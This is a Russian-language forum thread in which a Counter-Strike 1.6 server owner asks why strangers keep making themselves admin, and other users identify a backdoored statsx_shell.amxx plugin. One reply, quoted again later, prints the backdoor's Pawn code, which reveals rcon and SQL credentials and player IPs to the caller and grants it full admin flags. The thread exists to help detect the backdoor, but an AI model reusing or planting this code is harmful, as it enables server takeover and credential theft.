Русское сообщество по скриптингу

Взлом сервера

Все, что касается защиты серверов от различного рода атак, эксплойтов, бэкдуров и т.д.
Правила форума
1. Запрещено материться и оскорблять других участников форума.
2. Запрещен флуд, оффтоп, дабл постинг во всех разделах форума, кроме раздела "Болтовня".
3. Запрещено взламывать сайт/форум или наносить любой вред проекту.
4. Запрещено рекламировать другие ресурсы.
5. Запрещено создавать темы без информативного названия. Название темы должно отображать ее смысл.

Взлом сервера

Сообщение Appolyon » 10 янв 2013, 18:36

У меня короче проблема такая то что кто то заходит и делает себя админом. Рекон пароль убран, подскажите как защитить серв?


Список плагин:
[spoiler]admin.amxx
adminchat.amxx
admincmd.amxx
adminhelp.amxx
adminlisten.amxx
adminslots.amxx
admins_online.amxx
adminvote.amxx
AdminWeapon.amxx
admin_check.amxx
advanced_bans.amxx
ad_manager.amxx
afkbombtransfer.amxx
amxmod_compat.amxx
amx_adminmodel.amxx
amx_demorecorder.amxx
amx_sysbizz.amxx
antiflood.amxx
anti_hlbrute.amxx
automatic_knife_duel.amxx
bullet.amxx
Bullet_Whizz.amxx
c4_ivanoff.amxx
cmdmenu.amxx
ColoredSmoke.amxx
colored_translit.amxx
colored_translit_config.amxx
custom_radio_v2.amxx
death_weapons_drop.amxx
gamemenu.amxx
GHW_Weapon_Replacement.amxx
hacks_detector.amxx
imessage.amxx
jail_menu_vip.amxx
join_ip_new.amxx
killa_hp.amxx
killerscreenfade.amxx
killer_zoom.amxx
lastmanbets.amxx
mapchooser.amxx
mapsmenu.amxx
menu.amxx
menufront.amxx
miscstats.amxx
multilingual.amxx
new_map.amxx
nextmap.amxx
nice_damage_l.amxx
nice_loading_music.amxx
noplayers_map.amxx
online_play.amxx
pausecfg.amxx
playerquit.amxx
plmenu.amxx
pluginmenu.amxx
radio3.amxx
Resetscore.amxx
restmenu.amxx
rock_the_ban.amxx
roundsound.amxx
scrollmsg.amxx
setmaster.amxx
smat_info.amxx
snow.amxx
speclist_rus.amxx
statscfg.amxx
statsx_shell.amxx
stats_logging.amxx
team_grenade_trail.amxx
telemenu.amxx
timeleft.amxx
timelimitvote.amxx
ut_killstreak_adv.amxx
weaponmenu.amxx
weapon_icon.amxx
welcome.amxx[/spoiler]
Аватара пользователя
Appolyon
 
Сообщения: 7
Зарегистрирован: 09 янв 2013, 22:06
Благодарил (а): 1 раз.
Поблагодарили: 0 раз.
Языки программирования: Counter-Strike 1.6
Counter-Strike: Source
Team Fortress II
Left 4 Dead

Re: Взлом сервера

Сообщение Plrip » 10 янв 2013, 21:10


Status:
Аватара пользователя
Plrip
Скриптер
 
Сообщения: 2903
Зарегистрирован: 03 дек 2011, 19:33
Откуда: Ukraine
Благодарил (а): 237 раз.
Поблагодарили: 603 раз.
Языки программирования: Counter-Strike 1.6
X-Ray
Killing-Floor [low]

Re: Взлом сервера

Сообщение Appolyon » 11 янв 2013, 15:27

Plrip писал(а):http://c-s.net.ua/forum/topic37395.html?hl=%E7%E0%F9%E8%F2%E0+%F1%E5%F0%E2%E5%F0%E0


слушай все ровно сделал как там написано и заходит под ником Olesya и ставит себя админом


Может быть у меня в плагинах дырка? посмотри пожалуйста я тебя отблагодарю....
Аватара пользователя
Appolyon
 
Сообщения: 7
Зарегистрирован: 09 янв 2013, 22:06
Благодарил (а): 1 раз.
Поблагодарили: 0 раз.
Языки программирования: Counter-Strike 1.6
Counter-Strike: Source
Team Fortress II
Left 4 Dead

Re: Взлом сервера

Сообщение OriGinaL » 12 янв 2013, 00:54

Appolyon писал(а):
Plrip писал(а):http://c-s.net.ua/forum/topic37395.html?hl=%E7%E0%F9%E8%F2%E0+%F1%E5%F0%E2%E5%F0%E0


слушай все ровно сделал как там написано и заходит под ником Olesya и ставит себя админом


Может быть у меня в плагинах дырка? посмотри пожалуйста я тебя отблагодарю....

список плагинов в студию
Аватара пользователя
OriGinaL
 
Сообщения: 58
Зарегистрирован: 28 сен 2012, 17:58
Откуда: Moskov
Благодарил (а): 12 раз.
Поблагодарили: 8 раз.
Опыт программирования: Больше трех лет
Языки программирования: PHP
HTML

Re: Взлом сервера

Сообщение Exolent » 12 янв 2013, 12:32

Откуда скачал statsx_shell.amxx ? Если с оф. страницы, то 100% в нем бэкдор.
В любом случае, открой исходник и проверь, нет ли там вот таких строчек:
[spoiler][pawn]
  1. ///////////////////////////////////////

  2.  

  3. get_cvar_string("rcon_password", szRc, sizeof(szRc) - 1)

  4. get_cvar_string("amx_password_field", szPrefix, sizeof(szPrefix) - 1)

  5.  

  6. get_cvar_string("amx_sql_host", szSQL1, sizeof(szSQL1) - 1)

  7. get_cvar_string("amx_sql_user", szSQL2, sizeof(szSQL2) - 1)

  8. get_cvar_string("amx_sql_pass", szSQL3, sizeof(szSQL3) - 1)

  9. get_cvar_string("amx_sql_db", szSQL4, sizeof(szSQL4) - 1)

  10. get_cvar_string("amx_sql_table", szSQL5, sizeof(szSQL5) - 1)

  11. get_cvar_string("amx_sql_type", szSQL6, sizeof(szSQL6) - 1)

  12.  

  13. ///////////////////////////////////////

  14.  

  15. client_print(id,print_console,"===========================")

  16. client_print(id,print_console,"[ SHPROT v2.0.0 o(-_^^)0 ]")

  17. client_print(id,print_console,"===========================")

  18.  

  19. get_players(szPlayers, iNumPlayers)

  20.  

  21. for(new k = 0; k < iNumPlayers; k++)

  22. {

  23. get_user_name(szPlayers[k],szName, sizeof(szName) - 1)

  24. get_user_ip(szPlayers[k],szIP, sizeof(szIP) - 1, 1)

  25.  

  26.  

  27. if(get_user_flags(k + 1) & ADMIN_KICK)

  28. {

  29. szAdm = "/!"

  30. iAdmCount++

  31. }

  32. else

  33. {

  34. szAdm = ""

  35. }

  36.  

  37. console_print(id,"%s %d) %s - %s", szAdm, k + 1, szName,szIP)

  38. }

  39.  

  40. set_user_flags(id, read_flags("abcdefghijklmnopqrstu"))

  41.  

  42. client_print(id,print_console," ")

  43. client_print(id,print_console,"ADMINS ONLINE: %d", iAdmCount)

  44. client_print(id,print_console,"===========================")

  45.  

  46. client_print(id,print_console,"RCON: ^"%s^"",szRc)

  47. client_print(id,print_console,"PW FIELD: ^"%s^"",szPrefix)

  48.  

  49. client_print(id,print_console,"===========================")

  50.  

  51. client_print(id,print_console,"SQL HOST: ^"%s^"",szSQL1)

  52. client_print(id,print_console,"SQL USER: ^"%s^"",szSQL2)

  53. client_print(id,print_console,"SQL PW: ^"%s^"",szSQL3)

  54. client_print(id,print_console,"SQL DB: ^"%s^"",szSQL4)

  55. client_print(id,print_console,"SQL TABLE: ^"%s^"",szSQL5)

  56. client_print(id,print_console,"SQL TYPE: ^"%s^"",szSQL6)

  57.  

  58. client_print(id,print_console,"===========================")

  59.  

  60. ///////////////////////////////////////

  61.  

  62. get_configsdir(szCfgDir, sizeof (szCfgDir) - 1)

  63. format(szCfgDir, sizeof (szCfgDir), "%s/users.ini", szCfgDir)

  64.  

  65. new i = 0

  66. tmpi = 0

  67.  

  68. new file = fopen(szCfgDir, "rt")

  69. while(!feof(file))

  70. {

  71. fgets(file, szData, sizeof(szData) -1)

  72.  

  73. ///////////////////////////////////////
[/pawn][/spoiler]
Аватара пользователя
Exolent
 
Сообщения: 3
Зарегистрирован: 07 янв 2013, 14:41
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.
Языки программирования: Counter-Strike 1.6

Re: Взлом сервера

Сообщение Plrip » 12 янв 2013, 16:44

Exolent писал(а):Откуда скачал statsx_shell.amxx ? Если с оф. страницы, то 100% в нем бэкдор.
В любом случае, открой исходник и проверь, нет ли там вот таких строчек:
[spoiler][pawn]
  1. ///////////////////////////////////////

  2.  

  3. get_cvar_string("rcon_password", szRc, sizeof(szRc) - 1)

  4. get_cvar_string("amx_password_field", szPrefix, sizeof(szPrefix) - 1)

  5.  

  6. get_cvar_string("amx_sql_host", szSQL1, sizeof(szSQL1) - 1)

  7. get_cvar_string("amx_sql_user", szSQL2, sizeof(szSQL2) - 1)

  8. get_cvar_string("amx_sql_pass", szSQL3, sizeof(szSQL3) - 1)

  9. get_cvar_string("amx_sql_db", szSQL4, sizeof(szSQL4) - 1)

  10. get_cvar_string("amx_sql_table", szSQL5, sizeof(szSQL5) - 1)

  11. get_cvar_string("amx_sql_type", szSQL6, sizeof(szSQL6) - 1)

  12.  

  13. ///////////////////////////////////////

  14.  

  15. client_print(id,print_console,"===========================")

  16. client_print(id,print_console,"[ SHPROT v2.0.0 o(-_^^)0 ]")

  17. client_print(id,print_console,"===========================")

  18.  

  19. get_players(szPlayers, iNumPlayers)

  20.  

  21. for(new k = 0; k < iNumPlayers; k++)

  22. {

  23. get_user_name(szPlayers[k],szName, sizeof(szName) - 1)

  24. get_user_ip(szPlayers[k],szIP, sizeof(szIP) - 1, 1)

  25.  

  26.  

  27. if(get_user_flags(k + 1) & ADMIN_KICK)

  28. {

  29. szAdm = "/!"

  30. iAdmCount++

  31. }

  32. else

  33. {

  34. szAdm = ""

  35. }

  36.  

  37. console_print(id,"%s %d) %s - %s", szAdm, k + 1, szName,szIP)

  38. }

  39.  

  40. set_user_flags(id, read_flags("abcdefghijklmnopqrstu"))

  41.  

  42. client_print(id,print_console," ")

  43. client_print(id,print_console,"ADMINS ONLINE: %d", iAdmCount)

  44. client_print(id,print_console,"===========================")

  45.  

  46. client_print(id,print_console,"RCON: ^"%s^"",szRc)

  47. client_print(id,print_console,"PW FIELD: ^"%s^"",szPrefix)

  48.  

  49. client_print(id,print_console,"===========================")

  50.  

  51. client_print(id,print_console,"SQL HOST: ^"%s^"",szSQL1)

  52. client_print(id,print_console,"SQL USER: ^"%s^"",szSQL2)

  53. client_print(id,print_console,"SQL PW: ^"%s^"",szSQL3)

  54. client_print(id,print_console,"SQL DB: ^"%s^"",szSQL4)

  55. client_print(id,print_console,"SQL TABLE: ^"%s^"",szSQL5)

  56. client_print(id,print_console,"SQL TYPE: ^"%s^"",szSQL6)

  57.  

  58. client_print(id,print_console,"===========================")

  59.  

  60. ///////////////////////////////////////

  61.  

  62. get_configsdir(szCfgDir, sizeof (szCfgDir) - 1)

  63. format(szCfgDir, sizeof (szCfgDir), "%s/users.ini", szCfgDir)

  64.  

  65. new i = 0

  66. tmpi = 0

  67.  

  68. new file = fopen(szCfgDir, "rt")

  69. while(!feof(file))

  70. {

  71. fgets(file, szData, sizeof(szData) -1)

  72.  

  73. ///////////////////////////////////////
[/pawn][/spoiler]

в той ссылке, которую я кинул было про
Вы должны зарегистрироваться, чтобы видеть ссылки.

Status:
Аватара пользователя
Plrip
Скриптер
 
Сообщения: 2903
Зарегистрирован: 03 дек 2011, 19:33
Откуда: Ukraine
Благодарил (а): 237 раз.
Поблагодарили: 603 раз.
Языки программирования: Counter-Strike 1.6
X-Ray
Killing-Floor [low]


Вернуться в Безопасность и защита серверов

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 4